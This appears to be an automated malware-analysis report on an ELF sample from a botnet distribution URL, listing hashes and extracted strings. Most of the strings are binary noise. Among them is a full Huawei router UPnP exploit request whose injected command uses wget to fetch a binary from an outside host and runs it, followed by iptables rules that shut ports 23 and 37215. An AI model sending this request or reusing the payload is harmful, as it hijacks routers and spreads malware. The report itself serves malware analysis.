Sample details: a3bc20b9991e805e6f7db7848b3eac09

Hashes
MD5: a3bc20b9991e805e6f7db7848b3eac09
SHA1: b783f49b03871da133931aff0c7365a5d88adb08
SHA256: 6d3001cd307ff067f86d16660c91bf6e1b4d274152255e68d088f22446b49413
SSDEEP: 768:0n0a9xDwttuUGwJnHeNejbnzeyjuDHMddca8CpLomZtRWUCpkL:40a7Dwtt1YszjcsddQ1iiUCpkL
Details
File Type: ELF
Yara Hits
Source
http://185.62.190.159/bins/sh4.idopoc
Strings
		/sm"O,
qsj !<
Lds`La
Lds`La
AmH|g;"'
2)'#a)#)A
AmB{!+#;!
AmH|g;"'
2)'#a)#)A
AmB{!+#;!
/Sn"O}
P)'#a)#
AmB{!+#;!
}b`fBr-a
 (w$Q.u
P)'#a)#
AmB{!+#;!
=b4r-a
-b,j|a
d$Q u@
P)'#a)#
AmB{!+#;!
&	tpgc`
"ca!# 
P)'#a)#
AmB{!+#;!
#nla,b
`"1!Cc
R#ay!p1
)'#a)#)A
AmB{!+#;!
Q{#+#y
2*Uk!g
7zPz](p
R#ay!p1
)'#a)#)A
AmB{!+#;!
Q{#+#y
2*Uk!g
7zPz](p
)'#a)#
AmB{!+#;!
^]cla\
APe|l3j
)'#a)#
AmB{!+#;!
2-a#`)@
/s`miCWDX
	t@bsa9'
`)A|1)@,b9(
P2c003
3a9'CV9"
C)#8#b
"Bc#`ra
Gz#:"* 
f*!2-z#
Az"j!#c
ech3fsb
"ca:!#c
Cb+z":&#aj"R*
Z&#c\3
A,b+!p1
3l	|3j
0e1T\e
Sb)BSa
h.d^cba|1
b:" !ba|1
" !ba|1
" !ba|1
Sb)BSa
h.d^cba|1
b:" !ba|1
" !ba|1
" !ba|1
g3amA|1Qf
ql22,!!!%
$Q#d3ew
BSa;":
#{";"$
3g3a9"
A;"{!+!>
Rba(1v1
V2a,6f
As`\1s:
r,aV11
CcKc8#
(w2"$qq
(w2"$qq
(w2"$qq
3e3a u
a,q3b2
sc&0(C
c`K [ h&
qQSRVSWTXUYVZW[
qVcVf(@Vg= Vhm#Vi}&Vj
#`K`cm
vra2"qS
bCa-GSP
r'WCa	
s"f8#r!
j"UCc!X
j#WCc"U
rCc$V#W
j%XCc$V
Cb\fca
x'R$x'
sarb(1
,93fsesh
nRR8##f
eQQ(1!A!A
A8#,13
#cL33d
BcAR2a3f&g
gb/#fba
2("!ba
=R;Q 1	
da)mf0a
(-b2Qq
Q-b"(]e
sc-Cy!sb
"{#;""*
/Ck"O;
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g okay.gorillamc.party -l /tmp/ifipoc -r /bins/mips.idopoc; /bin/busybox chmod 777 * /tmp/ifipoc; /tmp/ifipoc huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
iptables -A INPUT -p tcp --destination-port 23 -j DROP
iptables -A INPUT -p tcp --destination-port 37215 -j DROP
*+)#0+XB
M$65&6SRS=
M$65&6SRS>B
B*+)#0+b
SPQVWT
/bin/sh
/dev/null
.shstrtab
.rodata
.ctors
.dtors